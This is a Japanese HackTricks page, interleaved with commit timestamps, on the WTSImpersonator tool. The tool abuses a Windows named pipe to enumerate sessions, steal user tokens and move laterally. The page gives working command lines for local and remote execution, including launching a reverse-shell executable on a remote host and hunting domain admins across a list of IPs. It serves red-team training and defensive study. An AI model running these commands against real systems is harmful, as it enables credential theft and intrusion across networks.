2023-11-05 22:25:47 +00:00
< details >
2024-02-08 03:59:37 +00:00
< summary > < strong > ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2023-11-05 22:25:47 +00:00
2024-02-08 03:59:37 +00:00
HackTricks をサポートする他の方法:
2024-01-02 22:36:59 +00:00
2024-02-08 03:59:37 +00:00
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェックしてください!
* [**公式PEASS& HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )、当社の独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) コレクションを発見する
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f ) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 で私をフォローする [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **ハッキングテクニックを共有するためにPRを** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) のGitHubリポジトリに提出する。
2023-11-05 22:25:47 +00:00
< / details >
2024-02-08 03:59:37 +00:00
**WTS Impersonator** ツールは ** "\\pipe\LSM_API_service"** RPC Named pipe を悪用して、ログインしているユーザーを秘密裏に列挙し、トークンを乗っ取り、従来のトークン模倣技術をバイパスします。このアプローチにより、ネットワーク内でのシームレスな横断移動が可能となります。この技術の革新は、**Omri Baso** によるもので、その作業は [GitHub ](https://github.com/OmriBaso/WTSImpersonator ) でアクセス可能です。
2023-11-05 22:25:47 +00:00
2024-02-08 03:59:37 +00:00
### コア機能
このツールは、一連のAPI呼び出しを介して動作します:
```powershell
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
2023-11-05 22:25:47 +00:00
```
2024-02-08 03:59:37 +00:00
### キー モジュールと使用方法
- **ユーザーの列挙**: ツールを使用して、ローカルおよびリモートユーザーの列挙が可能です。それぞれのシナリオに対応するコマンドを使用します:
- ローカルでの実行:
2023-11-05 22:25:47 +00:00
```powershell
.\WTSImpersonator.exe -m enum
```
2024-02-08 03:59:37 +00:00
- IPアドレスまたはホスト名を指定してリモートでの実行:
```powershell
2023-11-05 22:25:47 +00:00
.\WTSImpersonator.exe -m enum -s 192.168.40.131
```
2024-02-08 03:59:37 +00:00
- **コマンドの実行**: `exec` および `exec-remote` モジュールは **Service** コンテキストが必要です。ローカル実行では、WTSImpersonator実行可能ファイルとコマンドが必要です:
- ローカルコマンドの実行例:
2023-11-05 22:25:47 +00:00
```powershell
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
```
2024-02-08 03:59:37 +00:00
- サービスコンテキストを取得するために PsExec64.exe を使用できます:
2023-11-05 22:25:47 +00:00
```powershell
.\PsExec64.exe -accepteula -s cmd.exe
```
2024-02-08 03:59:37 +00:00
- **リモートコマンドの実行**: PsExec.exe と同様にリモートでサービスを作成およびインストールし、適切な権限で実行を許可します。
- リモート実行の例:
2023-11-05 22:25:47 +00:00
```powershell
2024-02-08 03:59:37 +00:00
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
2023-11-05 22:25:47 +00:00
```
2024-02-08 03:59:37 +00:00
- **ユーザーハンティングモジュール**: 複数のマシン上で特定のユーザーをターゲットにし、彼らの資格情報でコードを実行します。これは、複数のシステムでローカル管理者権限を持つドメイン管理者をターゲットにする際に特に有用です。
- 使用例:
2023-11-05 22:25:47 +00:00
```powershell
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
```